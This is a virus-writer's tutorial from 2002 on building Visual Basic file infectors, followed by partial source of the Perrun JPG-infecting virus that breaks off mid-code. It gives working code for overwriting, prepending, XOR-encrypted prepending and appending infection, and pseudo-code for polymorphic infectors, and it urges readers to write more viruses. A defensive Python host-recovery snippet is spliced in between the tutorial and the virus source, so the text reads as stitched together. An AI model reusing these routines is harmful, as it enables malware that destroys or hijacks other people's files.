it will store the result in variable a... for example, the virus is in c:\ in which notepad.exe, calc.exe, explorer.exe etc are present... when virus runs, variable a will contain, -------------------------------------------- a = notepad.exe/calc.exe/explorer.exe/... etc.. -------------------------------------------- then we'll create an array of filenames from variable a using split function then for each filename in the array, examine if the file is infected or not.... *** this routine makes the virus infect all the target files <<< code II.c.ii >>> '--------------- ... ... GoTo notinfected Else GoTo infected End If notinfected: 'infect eachhost infected: Next eachhost '--------------- *** this routine infects one file per run... <<< code II.c.iii >>> '---------------- ... ... GoTo notinfected Else GoTo infected End If notinfected: 'infect eachhost Exit For '!!! stop infecting others after infecting a file infected: Next eachhost '---------------- **************************** e) regenerating the host *** **************************** the only way we can regenerate the host from a virus/host file is to save the host's bits and bytes into a file, and let the virus execute that file... i only saw two ways of executing the spawned host file from the infected file... i'm lazy to research for more so i just borrowed those routines from vb5 virus by murkry and lennon virus by the walrus... 
-------------------------------------------- vb5 method -------------------------------------------- Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long Private Declare Function GetExitCodeProcess Lib "kernel32" (ByVal hProcess As Long, lpExitCode As Long) As Long Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long Private iResult As Long Private hProg As Long Private idProg As Long Private iExit As Long Const STILL_ACTIVE As Long = &H103 Const PROCESS_ALL_ACCESS As Long = &H1F0FFF 'execute spawned host file idProg = Shell("c:\hostfile.ext", vbNormalFocus) hProg = OpenProcess(PROCESS_ALL_ACCESS, False, idProg) GetExitCodeProcess hProg, iExit Do While iExit = STILL_ACTIVE DoEvents GetExitCodeProcess hProg, iExit Loop Kill "c:\hostfile.ext" ---------------------------------------------- ---------------------------------------------- lennon method ---------------------------------------------- Private Type STARTUPINFO cb As Long lpReserved As String lpDesktop As String lpTitle As String dwX As Long dwY As Long dwXSize As Long dwYSize As Long dwXCountChars As Long dwYCountChars As Long dwFillAttribute As Long dwFlags As Long wShowWindow As Integer cbReserved2 As Integer lpReserved2 As Long hStdInput As Long hStdOutput As Long hStdError As Long End Type Private Type PROCESS_INFORMATION hProcess As Long hThread As Long dwProcessID As Long dwThreadID As Long End Type Private Declare Function WaitForSingleObject Lib "kernel32" (ByVal hHandle As Long, ByVal dwMilliseconds As Long) As Long Private Declare Function CreateProcessA Lib "kernel32" (ByVal _ lpApplicationName As Long, ByVal lpCommandLine As String, ByVal _ lpProcessAttributes As Long, ByVal lpThreadAttributes As Long, _ ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, _ ByVal lpEnvironment As Long, ByVal lpCurrentDirectory As Long, _ lpStartupInfo As STARTUPINFO, 
lpProcessInformation As _ PROCESS_INFORMATION) As Long Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long Private Const NORMAL_PRIORITY_CLASS = &H20& Private Const INFINITE = -1& Public Sub ExecCmd(cmdline$) Dim proc As PROCESS_INFORMATION Dim start As STARTUPINFO Dim ReturnValue As Integer start.cb = Len(start) ReturnValue = CreateProcessA(0&, cmdline$, 0&, 0&, 1&, NORMAL_PRIORITY_CLASS, 0&, 0&, start, proc) Do ReturnValue = WaitForSingleObject(proc.hProcess, 0) DoEvents Loop Until ReturnValue <> 258 ReturnValue = CloseHandle(proc.hProcess) End Sub .... .... 'execute the regenerated host CommandArgument = Command() ExecCmd "hostfile.ext" & " " & CommandArgument Kill "hostfile.ext" ------------------------------------------- we've seen two methods.... and with a little research you can make a new one... if you're damn lazy like me, you must decide what to use from the previously laid routine... for now, we'll use the vb5 method, much shorter than the lennon method... if you wish to use the lennon method, then do so.. both have the same effects anyways.... ************************** f)the exact virus bytes ** ************************** you need the virus size to be able to carry on viral infection in visual basic... first put dummy size in the virus size constant.. then compile your source and use upx to compress the executable output... get the byte size of the compressed output and it will be the constant virus size that you'll put to your virus code... the smaller the virus, the better.... and that goes to a respected virus coder who likes his viruses small, Super... ****************************** g) the variables ************* ****************************** it is recommended to use option explicit and to define the variables that you'll use... your virus may not work properly if you don't define the variables that your virus will be using... i.e. Dim virusbytes as string Dim blah as long etc. 
some functions such as binary access read and binary access write require their variables to be explicitly defined... don't forget this... \\\\\\\\\\\\\\\\\\\\\ III - virology 101 \\\ \\\\\\\\\\\\\\\\\\\\\\\ so we're done on the preliminaries... we took up, *** getting started *** resolving virus path *** establishing the identity of the virus *** preventing reinfection and infecting all files per run or one file per run *** executing the hosts *** exact virus constant *** defining the variables and there's more... we're on the meat of the article so brace yourselves, get your popcorn and read.. ------------------- overwriting viruses ------------------- this is by far the easiest virus type to write.... an overwriting virus replaces its target files... it means that the target file will have the same filesize, same bytes as the virus... --------------- ----------------- ----------------- virus ------------> host ------------------> virus --------------- targets ----------------- host will become ----------------- ------------------------------ code III.a (overwrite) ------------------------------ 'targets exe files overwrite(virpath & eachhost) function overwrite(host as string) on error resume next dim virbyte as string dim sig as string dim virpath as string virpath = App.Path If Right(virpath, 1) <> "\" Then virpath = virpath & "\" filecopy virpath & app.exename & ".exe", host end function ------------------------------- assuming we have attached "signature" to the end of the original virus file with copy /b, then the reinfection of infected files shouldn't work.. :) ----------------------- overwriting viruses II ----------------------- if virus size is greater than the host, then the infected host will assume the size of the virus... if the host size is greater than the virus, then infected host will still hold the original host size.... 
----------------- ---------------- ------------------- virus ---------------> host ------------> virus ----------------- targets ------------------- host ---------------- ------------------- ------------------------------ code III.c (overwrite II) ------------------------------ 'targets exe files overwriteII(virpath & eachhost) function overwriteII(host as string) on error resume next dim virbyte as string dim sig as string dim virpath as string virpath = App.Path If Right(virpath, 1) <> "\" Then virpath = virpath & "\" Open virpath & App.EXEName & ".exe" For Binary Access Read As #2 virbyte = Space(5632) <--- for example, virus length is 12345 Get #2, , virbyte Close #2 sig = "signature" 'insert signature to prevent reinfection Open host For Binary Access Write As #3 Put #3, , virbyte Put #3, , sig Close #3 end function ------------------------------- to check for the signature in this type of infection (since our signature file won't be contained at the end of the infected host file anymore), use the code below... ------------------------------------------------ Open virpath & host For Binary Access Read As #1 vsig = Space(5632 + 9) <----virus length + length of signature Get #1, , vsig 'neglect the other bits and bytes Close #1 marker = Right(vsig, 9) if marker = "signature" then 'search for more else 'infect ------------------------------------------------- there's no way we can reconstruct the original host infected by an overwriting virus... so vb boys and girls, overwriting viruses are dangerous coz they destroy.. --------------------------------------------------------- <<<<<<<<<<<<< prepending viruses >>>>>>>>>>>>>>>>> --------------------------------------------------------- a prepending virus copies itself to the beginning of the host file and move the bits and bytes of the host file and position it after the virus' bits and bytes.... two notable examples of this are the vb5 virus by murkry and lennon virus by the walrus... 
------------------ ---------------------- ------------------ virus --------------> host --------------> virus ------------------ ---------------------- ------------------ host ------------------ ------------------------------ code III.c (prepend) ------------------------------ 'targets exe files prepend(virpath & eachhost) function prepend(host as string) on error resume next dim hostbyte as string dim virbyte as string dim sig as string dim virpath as string virpath = App.Path If Right(virpath, 1) <> "\" Then virpath = virpath & "\" Open host For Binary Access Read As #1 hostbyte = Space(LOF(1)) Get #1, , hostbyte Close #1 Open virpath & App.EXEName & ".exe" For Binary Access Read As #2 virbyte = Space(5632) <-------- virus length ::: the virus constant from the compressed output, yo! Get #2, , virbyte Close #2 sig = "signature" Open host For Binary Access Write As #3 Put #3, , virbyte Put #3, , hostbyte Put #3, , sig Close #3 end function ------------------------------- regenerating the host from infected files should be easy... *** a prepending virus reconstructuring its host ###### if virus, prepended to a host, is executed, it reads the virus bytes and the hostbytes + signature, writes the hostbytes + signature to a file, executes the regenerated host file and deletes the regenerated file.... ------------------------------------- code III.c.i ------------------------------------- using vb5 method ------------------------------------- Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long Private Declare Function GetExitCodeProcess Lib "kernel32" (ByVal hProcess As Long, lpExitCode As Long) As Long Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long Private iResult As Long Private hProg As Long Private idProg As Long Private iExit As Long Const STILL_ACTIVE As Long = &H103 Const PROCESS_ALL_ACCESS As Long = &H1F0FFF ... ... 
' executed in infected host reghost(virpath & app.exename & ".exe") Function reghost(goat As String) On Error Resume Next Dim hostbyte2 As String Dim virbyte2 As String Dim virpath As String Dim dechost As String virpath = App.Path If Right(virpath, 1) <> "\" Then virpath = virpath & "\" Open goat For Binary Access Read As #1 virbyte2 = Space(5632) <------ virus length hostbyte2 = Space(LOF(1) - 5632) <-------- host length :) Get #1, , virbyte2 Get #1, , hostbyte2 Close #1 ' write the host bytes into a file open virpath & "host.exe" For Binary Access Write As #2 Put #2, , hostbyte2 Close #2 idProg = Shell(virpath & "host.exe", vbNormalFocus) hProg = OpenProcess(PROCESS_ALL_ACCESS, False, idProg) GetExitCodeProcess hProg, iExit Do While iExit = STILL_ACTIVE DoEvents GetExitCodeProcess hProg, iExit Loop Kill virpath & "host.exe" End Function ------------------------------------------- --------------------------------- prepending viruses with a twist --------------------------------- the problem with prepending routine mentioned earlier is that avs can reconstruct the infected file... avs will just remove the virus from its position and relocate the host file to the position previously occupied by the virus... we want to give avs some headache, ayt? so we all agree... :) what do we want to do with the host file? "ENCRYPT IT, ALCO!".. i heard you, hehehehe.. so we'll encrypt the host file so "avs can do shit".. example of this is my virus VB.CHIMERA... ------------------ ---------------------- ------------------ virus --------------> host --------------> virus ------------------ ---------------------- ------------------ enchost ------------------ how do we do it? here's a code snippet that encrypts strings.. 
Function x(sText As String) On Error Resume Next Dim ekey As Long, i As Long Dim hash As String, crbyte As String ekey = 1234 <------- any number For i = 1 To Len(sText) hash = Asc(Mid(sText, i, 1)) crbyte = Chr(hash Xor (ekey Mod 255)) x = x & crbyte Next i End Function ------------------------------ code III.d (prepend with encryption) ------------------------------ 'targets exe files prepend(virpath & eachhost) function prepend(host as string) on error resume next dim hostbyte as string dim virbyte as string dim sig as string dim virpath as string dim enchost as string virpath = App.Path If Right(virpath, 1) <> "\" Then virpath = virpath & "\" Open host For Binary Access Read As #1 hostbyte = Space(LOF(1)) Get #1, , hostbyte Close #1 'encrypt host bytes enchost = x(hostbyte) Open virpath & App.EXEName & ".exe" For Binary Access Read As #2 virbyte = Space(5632) <-------- virus length ::: this can be any number Get #2, , virbyte Close #2 sig = "signature" Open host For Binary Access Write As #3 Put #3, , virbyte Put #3, , enchost Put #3, , sig Close #3 end function ..... ..... ' function x encrypts strings Function x(sText As String) On Error Resume Next Dim ekey As Long, i As Long Dim hash As String, crbyte As String ekey = 1234 For i = 1 To Len(sText) hash = Asc(Mid(sText, i, 1)) crbyte = Chr(hash Xor (ekey Mod 255)) x = x & crbyte Next i End Function ------------------------------- so in an infected host file, the virus is in the beginning of the file and the host is encrypted in the end... to regenerate the host, we can't do reading the encrypted host, putting the bytes into a file and executing it.... the original host won't execute coz the output file is not a valid w32 applix.. it's still encrypted... so the solution to our problem is to decrypt it.... assuming the virus is in it's encrypted host and we want to regenerate the host.... just pass the encrypted hostbytes to the function x and it will decrypt the host on the fly... 
------------------------------------- code III.d.i ------------------------------------- using vb5 method to reconstruct the host ------------------------------------- Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long Private Declare Function GetExitCodeProcess Lib "kernel32" (ByVal hProcess As Long, lpExitCode As Long) As Long Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long Private iResult As Long Private hProg As Long Private idProg As Long Private iExit As Long Const STILL_ACTIVE As Long = &H103 Const PROCESS_ALL_ACCESS As Long = &H1F0FFF ... ... ' executed in infected host reghost(virpath & app.exename & ".exe") Function reghost(goat As String) On Error Resume Next Dim hostbyte2 As String Dim virbyte2 As String Dim virpath As String Dim dechost As String virpath = App.Path If Right(virpath, 1) <> "\" Then virpath = virpath & "\" Open goat For Binary Access Read As #1 virbyte2 = Space(5632) <------ virus length hostbyte2 = Space(LOF(1) - 5632) <-------- host length :) Get #1, , virbyte2 Get #1, , hostbyte2 Close #1 'decrypt encrypted host dechost = x(hostbyte2) open virpath & "host.exe" For Binary Access Write As #2 Put #2, , dechost Close #2 idProg = Shell(virpath & "host.exe", vbNormalFocus) hProg = OpenProcess(PROCESS_ALL_ACCESS, False, idProg) GetExitCodeProcess hProg, iExit Do While iExit = STILL_ACTIVE DoEvents GetExitCodeProcess hProg, iExit Loop Kill virpath & "host.exe" End Function ..... ..... ' function x decrypts strings Function x(sText As String) On Error Resume Next Dim ekey As Long, i As Long Dim hash As String, crbyte As String ekey = 1234 For i = 1 To Len(sText) hash = Asc(Mid(sText, i, 1)) crbyte = Chr(hash Xor (ekey Mod 255)) x = x & crbyte Next i End Function ----------------------------------- again, avs will have a difficult time reconstructing the host file.... 
expect them to say, "you should delete infected files scanned as w32.blahblah virus..." nothing new... they always do that even if it's possible to reconstruct the host file.... avs are lazy.... \\\\\\\\\\\\\\\\\\\ IV - virology 102 \\ \\\\\\\\\\\\\\\\\\\\\ multicomponent vb virus in action!!! let's go, oi oi oi! reminder : to merge the components, use copy /b in ms-dos prompt.. if you ain't familiar with the command, type copy/? then press enter, :).. ----------------------- appending viruses ----------------------- i haven't seen an appending vb virus.... but i devised a way to make one.... from my previous article "Some New Ideas For Your Next VB Executable File Infector", ".... ====================================== appending vb viruses (sandwich method) ====================================== dim VIR as VB6 virus dim HOST as Host dim HD as VB6 component/pseudo-header illustration 2.a ================= ================== ====================== HD HD ================= ====================== VIR ------------------> HOST ------------------> HOST ================= ================== ====================== VIR ====================== illustration 2.b ================= ================== ====================== HD HD ================= ====================== HOST ------------------> HOST ------------------> HOST ================= ================== ====================== VIR VIR ================= ====================== ..." when an infected host is executed, the header is first called.... what does the header do? the header reads itself first then the virus code appended to the host, then writes the virusbytes and headerbytes into a file in this manner, ---------------- vir ---------------- hd ---------------- executes the vir/hd file thus continuing infection, reads the host bytes, writes the hostbytes in a file and executes the host... the intermediate virus file, ---------------- vir ---------------- hd ---------------- infects hosts in this manner.. 
it reads the vir bytes to a variable and the hd file in a variable, searches for a target file, reads the hostbytes into a variable, prepends the header file to the host then copies the hostbytes to the host and appends the virusbytes to the host.... here's a code snippet from my vb.sandwich virus ------------------------- code IV.a (vir component) ------------------------- .... .... Function virustime(hostpath As String) On Error Resume Next Dim ffile Dim hostcode As String Dim vir As String Dim vircode As String Dim header As String vir = App.Path If Right(vir, 1) <> "\" Then vir = vir & "\" Open hostpath For Binary Access Read As #1 hostcode = Space(LOF(1)) Get #1, , hostcode Close #1 ' the intermediate virus file = vir/hd Open vir & App.EXEName & ".exe" For Binary Access Read As #2 header = Space(LOF(2) - 5640) <------- header component (whole file minus virus bytes) vircode = Space(5640) <---- virus code Get #2, , vircode Get #2, , header Close #2 Open hostpath For Binary Access Write As #3 Put #3, , header Put #3, , hostcode Put #3, , vircode Close #3 End Function ------------------------ ---------------------------- code IV.b (header component) ---------------------------- Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long Private Declare Function GetExitCodeProcess Lib "kernel32" (ByVal hProcess As Long, lpExitCode As Long) As Long Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long Private iResult As Long Private hProg As Long Private idProg As Long Private iExit As Long Const STILL_ACTIVE As Long = &H103 Const PROCESS_ALL_ACCESS As Long = &H1F0FFF .... .... 
Dim vdir As String Dim hdlen As String Dim hostlen As String Dim virlen As String Dim buffhdlen As String Dim buffhostlen As String Dim buffvirlen As String vdir = App.Path If Right(vdir, 1) <> "\" Then vdir = vdir & "\" Open vdir & App.EXEName & ".exe" For Binary Access Read As #1 hdlen = (5632) hostlen = (LOF(1) - 11272) virlen = (5640) buffhdlen = Space(hdlen) buffhostlen = Space(hostlen) buffvirlen = Space(virlen) Get #1, , buffhdlen Get #1, , buffhostlen Get #1, , buffvirlen Close #1 'buff hostlen will contain the host bytes... .... .... Open vdir & "XxX.exe" For Binary Access Write As #3 Put #3, , buffhostlen Close #3 'borrowed from murkry's vb5 virus idProg = Shell(vdir & "XxX.exe", vbNormalFocus) hProg = OpenProcess(PROCESS_ALL_ACCESS, False, idProg) GetExitCodeProcess hProg, iExit Do While iExit = STILL_ACTIVE DoEvents GetExitCodeProcess hProg, iExit Loop Kill vdir & "XxX.exe" --------------------------- so we have made an appending virus... i read symantec's desc of vb.sandwich and they said that the virus prepends and appends itself to hosts... we can make the header in win32asm thus optimizing the header and emulate a true appending virus... but i'm a visual basic purist so i decided to make the header in vb eventhough the header size is nearly equal to the virus size.... it's still an appending virus coz the header is non-viral.... the virus is appended to the host file... ------------------------- polymorphic viruses ------------------------- we can't make a true polymorphic virus in vb... but we can make an improvised poly virus in vb... this has been tested and proven to be possible via my vb viruses, vb.polly and vb.polly.b (encrypts hosts) from my previous article "Some New Ideas For Your Next VB Executable File Infector", ".... ======================================= polymorphic vb viruses (REALLY? YEAH!) 
======================================= dim VIR as VB6 virus dim VIR1 as encrypted VB6 virus dim VIR2 as another encrypted form VB6 virus dim VIR(n) as another encrypted form VB6 virus dim HOST as Host dim ED as VB6 component/encryptor/decryptor illustration 3.a ... illustration 3.b ================= ================== ====================== ED ED ================= ====================== HOST ------------------> HOST ------------------> HOST ================= ================== ====================== VIR1 VIR2 ================= ====================== illustration 3.c ================= ================== ====================== ED ED ================= ====================== HOST ------------------> HOST ------------------> HOST ================= ================== ====================== VIR2 VIR(n) ================= ====================== ..." so let's make a pseudo code of this kinda virus ------------------------ pseudo-code I (encryptor/decryptor at the beginning) ------------------------ sub main() read ED and put in variable AX read HOST and put it in variable AY read VIR and put in in variable AZ read the key and put it in variable KEY decrypt AZ encrypted vir using KEY open virusfile for binary access write as #1 write decrypted VIR at the beginning write ED at the end close execute virusfile for infection delete virusfile write HOST in a new file execute HOST delete HOST end sub ------------------------- as you can see, this kinda virus produces an intermediate virus file, ---------------- vir ---------------- ed ---------------- and executes it to infect other files... ------------------------------ pseudo-code II (intermediate virus) ------------------------------ sub main() find new host read Decrypted VIR and put it in AX read ED and put it in AY read HOST and put it in AZ generate new KEY encrypt AX with new KEY.. 
open HOST for binary access write write AY (ED) in the beginning write AZ (HOST) in the middle write encrypted VIR write the new key at the end 'this will be used by our ed(encryptor/decryptor) to generate the variably encrypted virus.. close ------------------------------- if you'll imagine the infected files, the encrypted virus at the end possesses different forms in different files... thus polymorphism happened... if you're wondering how to insert the signature mark to prevent reinfection, i hope this illustration should help... intermediate virus produced by our poly vir infecting a host, ------------------------ virus reads virus code, ---------------------------- virus enc/dec with "alco" signature ------------------------ ------------> reads target host, reads enc/dec ----------> ---------------------------- enc/dec with attached with attached signature "alco" host "alco" at the end at the end, encrypts virus code with a new key ---------------------------- ------------------------ and writes the read components enc vir with new key to the host, the encrypted vir code and key ---------------------------- new key ---------------------------- ---------------------- preventing reinfection ---------------------- sub main() find host check for signature read the entire ed component+"alco" from the target host file if right(entire ed component + "alco", 4) <> "alco" then read virus code and put it in AX read ed and put it in AY read host and put it in AZ generate new key encrypt AX and with new key.. open host for binary access write write AY ed in the beginning write AZ host in the middle write encrypted virus code write the new key at the end 'this will be used by our ed(encryptor/decryptor) to generate the variably encrypted virus.. else search for more close ---------------------- you should attach the signature to the ed component using copy /b and treat the ed component length as ed component length plus the signature length... 
---------------------- two-in-one viruses ---------------------- yes, we can put two virus codes that "cooperate" in one host.... again, from my previous article "Some New Ideas For Your Next VB Executable File Infector", "... ========================================= the two-in-one vb virus (alternating hit) ========================================= dim VIR as VB6 virus dim VIR1 as another VB6 virus dim HOST as Host illustration 4.a ================= ================== ====================== VIR VIR1 ================= ====================== ------------------> HOST ------------------> VIR1 HOST ================= ================== ====================== VIR ====================== illustration 4.b ================= ================== ====================== VIR1 VIR ================= ====================== ------------------> HOST ------------------> HOST HOST ================= ================== ====================== VIR VIR1 ================= ====================== ..." a notable example of this is my file infector vb.yin-yang.. |||||||||||||||||| pseudo code \\\\\\ \\\\\\\\\\\\\\\\\\\ VIR in the beginning sub main() read VIR bytes to A read Hostbytes to B read VIR1 bytes to C search for target if not infected then read target host bytes to D prepend C to host write D to host append A to host close host else search for more 'regenerate host copy B to a file execute file delete file end sub VIR1 in the beginning sub main() read VIR1 bytes to A read Hostbytes to B read VIR bytes to C search for target if not infected then read target host bytes to D prepend C to host write D to host append A to host close host else search for more 'regenerate host copy B to a file execute file delete file end sub ||||||||||||||||||||||||||| \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ V - are you running out of ideas, alco? NOPE!\\\\\\\ \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ so that's all for now.. 
can't afford to make this article long coz i'm running out of patience, tea and cigarettes.. so expect a v1.1 of this article in the near future... i'm sure with the basic ideas, you can now code your first vb file infector... and with the basic ideas, you'll able to produces new, kewl ideas and implement it to your future file infector... help vb file infection grow by thinking of new things that we can implement on our future vb viruses...... bye for now, vb kids... \\\\\\\\\\\\\ alcopaul\\\\\\ \\\\\\\\\\\\\\\ july 19, 2002\\\ \\\\\\\\\\\\\\\\\ \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ End of Text File\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
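the "prepending viruses with a twist" section above says that xor-ing the host keeps avs from reconstructing it. the python below is an added example (not from the article, the author or any av product) showing the cleaner's side: because every exe starts with "MZ", the single key byte falls out of the first byte after the stub, and the host is recovered whether it was stored plain (code III.c) or xor-ed (code III.d). assumptions: the stub ends where its last pe section ends, the sample files are constructed header-only blobs, and all function names are hypothetical.

```python
import struct

MARKER = b"signature"      # reinfection marker the article appends after the host
ARTICLE_KEY = 1234 % 255   # the article's "ekey Mod 255", which is 214


def xor_bytes(data, key):
    """Single-byte XOR, the same transform as the article's function x."""
    return bytes(b ^ key for b in data)


def pe_end_of_image(data):
    """Return the file offset where the last PE section ends, or None if not a PE."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    nsections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    table = e_lfanew + 24 + opt_size          # section table follows the optional header
    end = table + 40 * nsections
    if end > len(data):
        return None
    for i in range(nsections):
        raw_size, raw_ptr = struct.unpack_from("<II", data, table + 40 * i + 16)
        if raw_size:
            end = max(end, raw_ptr + raw_size)
    return end


def known_plaintext_key(overlay):
    """Derive the XOR key from the known 'MZ' start; key 0 means a plain host."""
    if len(overlay) < 0x40:
        return None
    key = overlay[0] ^ ord("M")
    if overlay[1] ^ key != ord("Z"):
        return None
    e_lfanew = struct.unpack("<I", xor_bytes(overlay[0x3C:0x40], key))[0]
    if xor_bytes(overlay[e_lfanew:e_lfanew + 4], key) != b"PE\0\0":
        return None
    return key


def recover_host(infected):
    """Return (key, host_bytes, had_marker), or None when no appended host is found."""
    stub_end = pe_end_of_image(infected)
    if stub_end is None or stub_end >= len(infected):
        return None                            # not a PE, or nothing after the image
    overlay = infected[stub_end:]
    had_marker = overlay.endswith(MARKER)
    if had_marker:
        overlay = overlay[:-len(MARKER)]       # the marker is stored unencrypted
    key = known_plaintext_key(overlay)
    if key is None:
        return None
    return key, xor_bytes(overlay, key), had_marker


def fake_pe(total_size):
    """Constructed, non-executable PE-shaped blob: headers plus one zero-filled section."""
    buf = bytearray(total_size)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x80)    # e_lfanew
    buf[0x80:0x84] = b"PE\0\0"
    struct.pack_into("<H", buf, 0x86, 1)       # NumberOfSections
    struct.pack_into("<H", buf, 0x94, 0xE0)    # SizeOfOptionalHeader
    table = 0x80 + 24 + 0xE0
    struct.pack_into("<II", buf, table + 16, total_size - 0x200, 0x200)
    return bytes(buf)


# constructed sample: 5632-byte stub (the article's example size), xor-ed host, marker
SAMPLE_HOST = fake_pe(2048)
SAMPLE_INFECTED = fake_pe(5632) + xor_bytes(SAMPLE_HOST, ARTICLE_KEY) + MARKER

if __name__ == "__main__":
    key, host, marked = recover_host(SAMPLE_INFECTED)
    print("key:", key, "host bytes:", len(host), "marker present:", marked)
```

an overlay by itself proves nothing, since installers and signed files carry one too; the verdict rests on the overlay decoding to a pe image.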

sources

Perrun Virus Source Code
Alcopaul

-----------------------------
Perrun Virus Source Code
-----------------------------

i've written this when i was still a member of the rRlf ("hello rRlf guys!")... i decided to officially release the source in ebcvg #2...

history
--------

w32.hllp.jpginfector, as i named my lame proof-of-concept virus, was written on a fine afternoon of june 13, 2002 because i just wanted to make a working proof of my article "Infecting Picture Files : A Desperate Approach"... that lame article was written because of my reggae song "Your Kiss, Your Love and Some Pictures" dedicated to my girlfriend... so the root of all the Perrun phenomenon was not the eagerness to achieve fame... the root is LOVE... "Hi Janis!" :)

after the finishing touches to the binary, i submitted it to av sites... trend, symantec, mcafee.. (can't clearly remember if i submitted it to avp, f-secure and sophos).... then i rested and ate my dinner.... i checked my mail again then i received the remails from symantec and mcafee... i cleaned those excess trashes but luckily i forgot to delete mcafee's

------------------------------------------------------------------------
From: "Vsample" <Vsample@avertlabs.com>
To: "'alcopaul'" <alcopaul@digitelone.com>
Subject: RE: Variant Found: 233006 - first virus attacking jpg files...
Date: Thu, 13 Jun 2002 07:56:01 -0700

Thanks very much for the sample.
We have named this to W32/Perrun
We have added a description on our virus library. See link below.
http://vil.nai.com/vil/content/v_99522.htm <http://vil.nai.com/vil/content/v_99522.htm>
Again thanks very much and we value your contribution.

Regards,
Mohinder Gill
Virus Research Analyst
McAFEE AVERT (UK)
A Division of NAI Labs

When sending Virus Samples
If you require further assistance with this virus or other virus detection and/or cleaning please send the proposed sample(s) zipped with the password "infected" (lower case) to one of the email addresses listed below.

Please note: We sometimes receive a file that is analysed as cleaned, but actually find later that the file was infected when it left the sender, and was cleaned along the line by mail gateway scanners, hence the need for password-protected zip files.

NOTE: We try our very best to process the incoming samples as soon as they arrive and hope to respond to customers on the same day. However our official response time for virus samples is 48 hours (excluding weekends). This time may be extended due to samples which require further analysis.

All product-related questions and comments can be addressed through technical support and customer service, including:
* Any Virus Removal issues
* product installation and update questions
* product usage questions
* specific operating system/version questions

For samples related issues please contact:
UK: Vsample@nai.com
USA: Virus_Research@nai.com
Germany: Virus_Research_DE@nai.com
France Virus_Research_FR@nai.com
Rest of Europe Virus_Research_Europe@nai.com
Please send samples to one of the above addresses only.

For Technical Support issues please contact:
UK-
* +44 (0) 1296 318 733
* +44 (0) 1296 318 734
Email: TVD-Support-UK@nai.com <mailto:TVD-Support-UK@nai.com>
Rest of Europe- tech-support-europe@nai.com
* +31 (0) 20 586 6100

Useful WEB sites
www.nai.com (Network Associates Inc. products)
http://www.mcafeeb2b.com/asp_set/anti_virus/alerts/intro.asp (Stay ahead of New Viruses)
http://www.mcafeeb2b.com/naicommon/download/dats/find.asp (Latest Dat files / SuperDats 4.1.60 engine)
http://vil.nai.com/villib/alpha.asp (NAI Virus Library - Descriptions of viruses)

-----Original Message-----
From: alcopaul [mailto:alcopaul@digitelone.com]
Sent: 13 June 2002 11:06
To: virus_research@nai.com
Subject: Variant Found: 233006 - first virus attacking jpg files...

<< File: JPG_Virus_Final_Release.zip >> << File: MAVIS.txt >>
hope to see a desc from your site.. it's a new way of infection..
:) ____________________________________________________________________ ** Get your free E-Mail account at WWW.DIGITELONE.COM ** ---------------------------------------------------------------------------- *** i just wanted mcafee to see a description of it from their site... nothing more, nothing less.. :P then two days after my submission of the virus to av sites, i checked out zdnet for some news.. then i found an article that refers to Perrun.. "what a heck! that's my virus!", i thought... i tried my luck to see some of my virus' articles in yahoo then i got a lot of hits... can't please everybody.. there exist many criticisms about this virus... i read a lot of them... hehehe.. but i don't care.. final thought : this is a lame virus that "shook" the news for one time... enjoy.. alcopaul indirect thanks to murkry.. i borrowed the spawned host execution routine from his vb virus... ========================= virus ========================= Attribute VB_Name = "Module1" Option Explicit Private Sub Main() On Error Resume Next Dim ffile Dim jpgvir As String Dim sfile As String Dim a As String Dim vc As String Dim spath As String Dim arr1 Dim host As Variant Dim lenhost As Long Dim mark As String Dim g As String 'probable host ffile = FreeFile 'resolve virus path jpgvir = App.Path If Right(jpgvir, 1) <> "\" Then jpgvir = jpgvir & "\" 'find picture files in directory of the virus sfile = Dir$(jpgvir & "*.jpg") While sfile <> "" a = a & spath & sfile & "/" sfile = Dir$ Wend 'store filenames in array arr1 = Split(a, "/") '1 by 1 query... and now introducing a new algorithm for 1 infection per run For Each host In arr1 'check for virus sig Open jpgvir & host For Binary Access Read As #ffile lenhost = (LOF(ffile)) vc = Space(lenhost) Get #ffile, , vc Close #ffile mark = Right(vc, 4) If mark <> "alco" Then 'not infected? 'infect! GoTo notinfected Else 'infected? 'search for moe! 
